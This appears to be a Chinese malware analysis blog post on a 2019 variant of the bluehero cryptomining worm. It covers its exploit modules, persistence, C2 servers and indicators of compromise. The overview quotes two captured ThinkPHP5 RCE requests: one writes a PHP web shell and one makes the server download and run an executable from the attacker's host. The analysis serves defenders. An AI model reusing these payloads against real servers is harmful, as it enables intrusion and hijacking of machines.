bluehero挖矿蠕虫新变种v20190604简单分析

栏目: 编程工具 · 发布时间: 5年前

内容简介:捕获到利用thinkphp5 rce漏洞的攻击记录,经分析为bluehero新变种,编译时间为20190604。SHA256:6180a1db3b1267eec5fba215be7696435bcb746a34b3b8692c99554e9edbe68bupx脱壳

0x00 概述

捕获到利用thinkphp5 rce漏洞的攻击记录,经分析为bluehero新变种,编译时间为20190604。

attack:http://1.2.3.4:80/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php $action = $_GET[‘xcmd’];system($action);?^>>hydra.php;
attack:http://1.2.3.4:80/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile(‘http://fid.hognoob.se/download.exe’,’SystemRoot/Temp/wtrgaltqtqzkxtb28962.exe’);start SystemRoot/Temp/wtrgaltqtqzkxtb28962.exe;

0x01 逆向分析

download.exe:

SHA256:6180a1db3b1267eec5fba215be7696435bcb746a34b3b8692c99554e9edbe68b

upx脱壳

upx.exe -d “” -o “”

编译时间戳

2019-06-04 04:26:51

PEID

  • PE: packer: UPX(3.94)[NRV,brute]
  • PE: compiler: Microsoft Visual C/C++(6.0)[-]
  • PE: linker: Microsoft Linker(6.0)[EXE32]

入口所在段

UPX1

镜像基地址

0x400000

入口点(OEP)

0x4dcc0

下载母体文件

bluehero挖矿蠕虫新变种v20190604简单分析

存储到%SystemRoot%\Temp\SunloglicySrv.exe。

SunloglicySrv.exe

upx脱壳

下载配置

http://uio.hognoob.se:63145/cfg.ini

bluehero挖矿蠕虫新变种v20190604简单分析

bluehero挖矿蠕虫新变种v20190604简单分析

生成ip段

获取本地IP地址,访问http://2019.ip138.com/ic.asp 获取所在公网ip,将生成的ip段包括所在公网的B段,以及随机生成的公网地址保存为ip.txt,启动端口扫描 工具 对ip的139/445端口进行扫描,将扫描结果保存到result.txt。

bluehero挖矿蠕虫新变种v20190604简单分析

bluehero挖矿蠕虫新变种v20190604简单分析

bluehero挖矿蠕虫新变种v20190604简单分析

用masscan扫描内网和外网的端口

bluehero挖矿蠕虫新变种v20190604简单分析

bluehero挖矿蠕虫新变种v20190604简单分析

bluehero挖矿蠕虫新变种v20190604简单分析

永恒之蓝攻击(32/64)

bluehero挖矿蠕虫新变种v20190604简单分析

bluehero挖矿蠕虫新变种v20190604简单分析

bluehero挖矿蠕虫新变种v20190604简单分析

bluehero挖矿蠕虫新变种v20190604简单分析

cve-2019-2725攻击

bluehero挖矿蠕虫新变种v20190604简单分析

ipc$爆破

利用内置密码字典进行ipc$远程爆破,爆破登录成功后在目标机器利用psexec工具或者wmic执行远程命令植入木马程序。

bluehero挖矿蠕虫新变种v20190604简单分析

cve-2017-5638攻击

bluehero挖矿蠕虫新变种v20190604简单分析

cve-2017-10271攻击

好像和2725用的是相同的payload。

bluehero挖矿蠕虫新变种v20190604简单分析

thinkphp5 rce攻击

bluehero挖矿蠕虫新变种v20190604简单分析

tomcat put 攻击

bluehero挖矿蠕虫新变种v20190604简单分析

0x02 流量分析

download.exe

bluehero挖矿蠕虫新变种v20190604简单分析

SunloglicySrv.exe下载cfg.ini

bluehero挖矿蠕虫新变种v20190604简单分析

爆破mssql-1433

bluehero挖矿蠕虫新变种v20190604简单分析

0x03 行为分析

SystemRoot/Temp/wtrgaltqtqzkxtb28962.exe(即download.exe)

运行后自删除,并释放后门文件ucokcu.exe(随机六字母文件名)

该程序没有图标,没文件名,具有隐蔽性,后门程序作为系统服务启动。

bluehero挖矿蠕虫新变种v20190604简单分析

bluehero挖矿蠕虫新变种v20190604简单分析

bluehero挖矿蠕虫新变种v20190604简单分析

bluehero挖矿蠕虫新变种v20190604简单分析

download.exe下载病毒母体SunloglicySrv.exe

bluehero挖矿蠕虫新变种v20190604简单分析

写入到C:\webkitssdk\2.7.92\目录下(不确定是SunloglicySrv.exe还是ucokcu.exe,按微步的沙箱看应该是ucokcu.exe)

bluehero挖矿蠕虫新变种v20190604简单分析

bluehero挖矿蠕虫新变种v20190604简单分析

木马后门黑客服务器ip。

bluehero挖矿蠕虫新变种v20190604简单分析

bluehero挖矿蠕虫新变种v20190604简单分析

SunloglicySrv.exe

下载挖矿配置cfg.ini

释放一堆文件:

zunnrhu.exe和SunloglicySrv.exe基本一样,含有多种攻击模块。

bluehero挖矿蠕虫新变种v20190604简单分析 bluehero挖矿蠕虫新变种v20190604简单分析

bluehero挖矿蠕虫新变种v20190604简单分析

bluehero挖矿蠕虫新变种v20190604简单分析

ipc$爆破,利用mimikatz读取密码。

bluehero挖矿蠕虫新变种v20190604简单分析

疑似端口扫描程序。

bluehero挖矿蠕虫新变种v20190604简单分析

永恒之蓝。

bluehero挖矿蠕虫新变种v20190604简单分析

cve-2017-8464。

bluehero挖矿蠕虫新变种v20190604简单分析

生成ip段

bluehero挖矿蠕虫新变种v20190604简单分析

利用procdump和psexec。

bluehero挖矿蠕虫新变种v20190604简单分析

bluehero挖矿蠕虫新变种v20190604简单分析

矿机程序,xmrig挖门罗币。

upx脱壳

bluehero挖矿蠕虫新变种v20190604简单分析 bluehero挖矿蠕虫新变种v20190604简单分析 bluehero挖矿蠕虫新变种v20190604简单分析

矿池

bluehero挖矿蠕虫新变种v20190604简单分析

bluehero挖矿蠕虫新变种v20190604简单分析

添加计划任务。

bluehero挖矿蠕虫新变种v20190604简单分析 bluehero挖矿蠕虫新变种v20190604简单分析

添加服务。

bluehero挖矿蠕虫新变种v20190604简单分析 bluehero挖矿蠕虫新变种v20190604简单分析

攻击7001,weblogic漏洞。

bluehero挖矿蠕虫新变种v20190604简单分析

连接黑客服务器80.82.70.188:35791(远控)

bluehero挖矿蠕虫新变种v20190604简单分析

相关进程。

bluehero挖矿蠕虫新变种v20190604简单分析 bluehero挖矿蠕虫新变种v20190604简单分析

0x04 关联分析

fid.hognoob.se

注册时间2019-03-01 00:00:00

过期时间2020/3/1 0:00:00

45.67.14.164(英国 英格兰 伦敦)

21/tcp   open   ftp            Pure-FTPd

80/tcp   open   http           nginx

9898/tcp open   http           Ajenti http control panel

fid.hognoob.se服务器iP:

当前解析:

英国45.67.14.164

历史解析记录:

2019-05-15—–2019-06-1445.67.14.164

2019-05-08—–2019-05-08195.128.124.189

2019-04-27—–2019-04-28195.128.124.159

2019-04-15—–2019-04-18195.128.127.237

2019-04-01—–2019-04-1145.67.14.168

2019-03-17—–2019-03-19195.128.127.254

2019-03-13—–2019-03-1345.79.66.44

bt宝塔面板

bluehero挖矿蠕虫新变种v20190604简单分析

45.67.14.164

英国 英格兰 伦敦

运营商:pitcommunications.net

bluehero挖矿蠕虫新变种v20190604简单分析

195.128.124.140

XMRCoinMiner挖矿木马

运营商:inoventica.ru

俄罗斯莫斯科

80.82.70.234

荷兰 阿姆斯特丹Ecatel公司

185.164.72.143

iis7.5

猜测攻击者应该是欧洲的。

0x05 IOC

http://fid.hognoob.se/download.exe (45.67.14.164)//19日更改解析ip(80.82.70.234)//22日更改解析为127.0.0.1/ 185.164.72.143 ( 荷兰北阿姆斯特丹/伊朗 )

SHA-256: 6180a1db3b1267eec5fba215be7696435bcb746a34b3b8692c99554e9edbe68b

http://fid.hognoob.se/ S unloglicySrv.exe

SHA-256: e5f1244002929418a08d4623b7de39ccf591acb868d0e448ed4f7174d03c2c81

http://uio.hognoob.se:63145/cfg.ini (45.67.14.166)

195.128.124.140

0x06 结语

总体来说,v20190604版本和之前的bluehero版本差别不大,也可能是分析不完全,如有错漏,欢迎指点!

0x07 参考资料

v201808

https://www.freebuf.com/column/180544.html

v201903

https://s.tencent.com/research/report/675.html

v201905

https://s.tencent.com/research/report/724.html


以上所述就是小编给大家介绍的《bluehero挖矿蠕虫新变种v20190604简单分析》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

社群运营五十讲

社群运营五十讲

陈菜根 / 北京时代华文书局 / 2018-4-1 / 49.80

物以类聚,人以群分,社群营销不只是简单的建群、卖东西,而是建立一种自动运转的,去中心化的生态圈,让相同爱好的人产生关系,迸发出裂变的火花,创造更多的营销机会。本书从基本的社群概念入手,讲解了社群的五大要素,社群活动的运作,社群的变现模式以及如何做一个社群师等内容,最后再从如何打造社群IP入手,详细讲解了社群IP的定义、分类及操作过程。一起来看看 《社群运营五十讲》 这本书的介绍吧!

HTML 编码/解码
HTML 编码/解码

HTML 编码/解码

Base64 编码/解码
Base64 编码/解码

Base64 编码/解码